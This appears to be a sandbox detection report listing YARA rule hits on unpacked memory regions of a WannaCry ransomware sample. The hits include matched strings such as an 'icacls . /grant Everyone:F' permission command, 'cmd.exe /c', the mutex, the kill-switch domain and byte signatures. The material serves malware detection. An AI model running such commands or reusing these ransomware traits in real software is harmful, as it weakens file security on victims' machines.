0.0.stN592INV6.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.stN592INV6.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.252e96c.6.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.252e96c.6.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.252e96c.6.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.252e96c.6.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.252e96c.6.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.252e96c.6.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.252e96c.6.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.252e96c.6.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.stN592INV6.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.stN592INV6.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.stN592INV6.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.stN592INV6.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
2.0.tasksche.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2.0.tasksche.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
2.0.tasksche.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
2.0.tasksche.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.1fdc084.5.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x283de4:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x273bb0:$x3: tasksche.exe 0x283dc0:$x3: tasksche.exe 0x283d9c:$x4: Global\MsWinZonesCacheCounterMutexA 0x283e14:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x273c1b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x23e26c:$x7: mssecsvc.exe 0x259b94:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x273b88:$x8: C:\%s\qeriuwjhrf 0x283de4:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x23e254:$s1: C:\%s\%s 0x259b7c:$s1: C:\%s\%s 0x273b9c:$s1: C:\%s\%s 0x283d14:$s3: cmd.exe /c "%s" 0x2b6268:$s4: msg/m_portuguese.wnry
1.2.stN592INV6.exe.1fdc084.5.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.2.stN592INV6.exe.1fdc084.5.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.1fdc084.5.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x283dc0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x283de8:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.1fdc084.5.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2768fe:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x24a8d4:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x24c25a:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x27c0a2:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.stN592INV6.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.stN592INV6.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.stN592INV6.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.stN592INV6.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.24fc8c8.9.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x3136c:$x3: tasksche.exe 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.2.stN592INV6.exe.24fc8c8.9.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.2.stN592INV6.exe.250b948.8.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x2dd20:$x1: icacls . /grant Everyone:F /T /C /Q 0x1daec:$x3: tasksche.exe 0x2dcfc:$x3: tasksche.exe 0x2dcd8:$x4: Global\MsWinZonesCacheCounterMutexA 0x2dd50:$x5: WNcry@2ol7 0x1db57:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x76d0:$x7: mssecsvc.exe 0x1dac4:$x8: C:\%s\qeriuwjhrf 0x2dd20:$x9: icacls . /grant Everyone:F /T /C /Q 0x76b8:$s1: C:\%s\%s 0x1dad8:$s1: C:\%s\%s 0x2dc50:$s3: cmd.exe /c "%s" 0x601a4:$s4: msg/m_portuguese.wnry 0x1ae0c:$s5: \\192.168.56.20\IPC$ 0xb601:$s6: \\172.16.99.5\IPC$ 0x21226:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x20f00:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x20aec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.24fc8c8.9.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.250b948.8.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.250b948.8.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x2dcfc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x2dd24:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.200e128.3.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.200e128.3.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.200e128.3.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.200e128.3.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.stN592INV6.exe.25078e8.7.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.stN592INV6.exe.25078e8.7.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x36580:$x1: icacls . /grant Everyone:F /T /C /Q 0x2634c:$x3: tasksche.exe 0x3655c:$x3: tasksche.exe 0x36538:$x4: Global\MsWinZonesCacheCounterMutexA 0x365b0:$x5: WNcry@2ol7 0x263b7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xc330:$x7: mssecsvc.exe 0x26324:$x8: C:\%s\qeriuwjhrf 0x36580:$x9: icacls . /grant Everyone:F /T /C /Q 0xc318:$s1: C:\%s\%s 0x26338:$s1: C:\%s\%s 0x364b0:$s3: cmd.exe /c "%s" 0x68a04:$s4: msg/m_portuguese.wnry 0x2366c:$s5: \\192.168.56.20\IPC$ 0x10a61:$s6: \\172.16.99.5\IPC$ 0x29a86:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x29760:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x2934c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.25078e8.7.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.stN592INV6.exe.25078e8.7.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x3655c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x36584:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.stN592INV6.exe.1feb104.2.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x2dd20:$x1: icacls . /grant Everyone:F /T /C /Q 0x1daec:$x3: tasksche.exe 0x2dcfc:$x3: tasksche.exe 0x2dcd8:$x4: Global\MsWinZonesCacheCounterMutexA 0x2dd50:$x5: WNcry@2ol7 0x1db57:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x76d0:$x7: mssecsvc.exe 0x5089ec:$x7: mssecsvc.exe 0x1dac4:$x8: C:\%s\qeriuwjhrf 0x2dd20:$x9: icacls . /grant Everyone:F /T /C /Q 0x76b8:$s1: C:\%s\%s 0x1dad8:$s1: C:\%s\%s 0x5089d4:$s1: C:\%s\%s 0x2dc50:$s3: cmd.exe /c "%s" 0x601a4:$s4: msg/m_portuguese.wnry 0x1ae0c:$s5: \\192.168.56.20\IPC$ 0xb601:$s6: \\172.16.99.5\IPC$ 0x50d5a9:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x21226:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x20f00:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x20aec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.stN592INV6.exe.1feb104.2.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
